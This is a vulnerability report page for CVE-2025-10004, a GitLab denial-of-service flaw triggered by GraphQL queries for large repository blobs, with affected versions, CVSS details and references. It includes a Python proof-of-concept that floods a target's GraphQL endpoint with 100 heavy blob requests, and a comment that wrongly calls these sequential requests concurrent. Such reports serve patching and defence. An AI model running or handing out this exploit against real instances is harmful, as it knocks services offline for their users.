Security Vulnerability Report
CVE-2025-10004 CVSS 7.5 HIGH

Published: 2025-10-09 12:15:35
Last Modified: 2025-10-20 20:57:05

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.12 to 18.2.8, 18.3 to 18.3.4, and 18.4 to 18.4.2 that could make the GitLab instance unresponsive or severely degraded by sending crafted GraphQL queries requesting large repository blobs.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE >= 13.12, < 18.2.8
GitLab CE/EE >= 18.3.0, < 18.3.4
GitLab CE/EE >= 18.4.0, < 18.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10004 PoC - GitLab GraphQL DoS via Large Blob Requests
# This PoC demonstrates how to exploit the vulnerability by sending
# crafted GraphQL queries requesting large repository blobs

import requests
import json

TARGET_URL = "https://gitlab.example.com/api/graphql"

# GraphQL query requesting large blobs from a repository
GRAPHQL_QUERY = """
query GetLargeBlobs($projectPath: ID!) {
  project(fullPath: $projectPath) {
    repository {
      blobs(paths: ["large_file_1.bin", "large_file_2.bin", "large_file_3.bin"]) {
        nodes {
          name
          size
          rawBlob
          rawTextBlob
        }
      }
    }
  }
}
"""


def exploit(target_url, project_path):
    """
    Send crafted GraphQL query to exhaust server resources
    by requesting large repository blobs
    """
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json"
    }

    payload = {
        "query": GRAPHQL_QUERY,
        "variables": {
            "projectPath": project_path
        }
    }

    # Send multiple concurrent requests to amplify the DoS effect
    for i in range(100):
        try:
            response = requests.post(
                target_url,
                headers=headers,
                json=payload,
                timeout=30
            )
            print(f"Request {i+1}: Status {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"Request {i+1}: Error - {e}")


if __name__ == "__main__":
    # Replace with target GitLab instance and a project containing large files
    exploit(TARGET_URL, "group/project-with-large-files")
```

References

https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/568121 (Broken Link)
https://hackerone.com/reports/3026555 (Permissions Required)

Weakness

CWE-770